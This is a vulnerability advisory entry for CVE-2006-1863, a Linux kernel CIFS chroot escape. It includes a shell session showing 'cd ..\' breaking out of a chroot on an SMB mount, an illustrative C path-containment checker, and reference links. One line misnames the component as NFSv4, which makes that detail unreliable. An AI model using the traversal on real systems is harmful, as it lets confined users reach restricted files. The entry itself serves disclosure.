Linux Kernel CIFS chroot Directory Traversal Vulnerability

Vulnerability ID: 1110152
Vulnerability type: Path traversal
Published: 2006-04-28
Updated: 2007-01-18
CVE ID: CVE-2006-1863
CNNVD-ID: CNNVD-200604-444
Platform: Linux
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/27769
https://www.securityfocus.com/bid/17742
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-444
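|Vulnerability details
The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA). The NFSv4 implementation is one of its distributed file system protocols. The CIFS mounted file system in the Linux kernel contains an input validation error. A local attacker can use the "..\\" directory traversal sequence to bypass the chroot restriction and access restricted resources.
|Exploit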
source: http://www.securityfocus.com/bid/17742/info

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data.

The problem affects chroot inside of an SMB-mounted filesystem ('cifs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.

[root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\
bash-2.05a# pwd
/..
bash-2.05a# ls
<list of files from parent>
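
The session above works because the local VFS and the SMB server disagree about what a path separator is. The following added example (not the kernel's fix and not code from the original advisory) resolves a path with both '/' and '\' treated as separators and reports whether it leaves the confinement root; the function names and sample paths are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not kernel code): returns 1 if `path`, taken relative
 * to a confinement root, stays inside it when BOTH '/' and '\\' are treated
 * as separators (the server-side view); returns 0 if it climbs above it. */
static int stays_inside_root(const char *path)
{
    int depth = 0;                      /* directories below the root */
    const char *p = path;

    while (*p) {
        while (*p == '/' || *p == '\\') /* skip separators of either kind */
            p++;
        size_t len = strcspn(p, "/\\"); /* length of the next component */
        if (len == 0)
            break;
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (depth == 0)
                return 0;               /* ".." at the root: escape */
            depth--;
        } else if (!(len == 1 && p[0] == '.')) {
            depth++;                    /* ordinary directory or file name */
        }
        p += len;
    }
    return 1;
}

/* Local view: only '/' splits components, so the single component "..\\"
 * is not recognised as ".." and is not clamped at the chroot root. */
static int local_vfs_sees_dotdot(const char *component)
{
    return strcmp(component, "..") == 0;
}

int main(void)
{
    /* Constructed sample paths, not taken from the advisory. */
    const char *samples[] = { "etc/passwd", "lib/../bin", "..\\", "a\\..\\..\\x" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%-12s local '..': %d  -> %s\n", samples[i],
               local_vfs_sees_dotdot(samples[i]),
               stays_inside_root(samples[i]) ? "inside" : "ESCAPES");
    return 0;
}
```

This check is conservative: it also rejects a plain ".." at the root, which the local kernel would simply clamp to the chroot directory.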
|Affected products
Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
|References

Source: bugzilla.redhat.com
Link: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189434
Source: www.kernel.org
Link: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=296034f7de8bdf111984ce1630ac598a9c94a253
Source: XF
Name: kernel-cifs-directory-traversal(26141)
Link: http://xforce.iss.net/xforce/xfdb/26141
Source: TRUSTIX
Name: 2006-0024
Link: http://www.trustix.org/errata/2006/0024
Source: BID
Name: 17742
Link: http://www.securityfocus.com/bid/17742
Source: OSVDB
Name: 25068
Link: http://www.osvdb.org/25068
Source: SUSE
Name: SUSE-SA:2006:028
Link: http://www.novell.com/linux/security/advisories/2006-05-31.html
Source: MANDRIVA
Name: MDKSA-2006:151
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2006:151
Source: MANDRIVA
Name: MDKSA-2006:150
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2006:150
Source: www.kernel.org
Link: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.11
Source: VUPEN
Name: ADV-2006-2554
Link: http://www.frsirt.com/english/advisories/2006/2554
Source: VUPEN
Name: ADV-2006-1542
Link: http://www.frsirt.com/en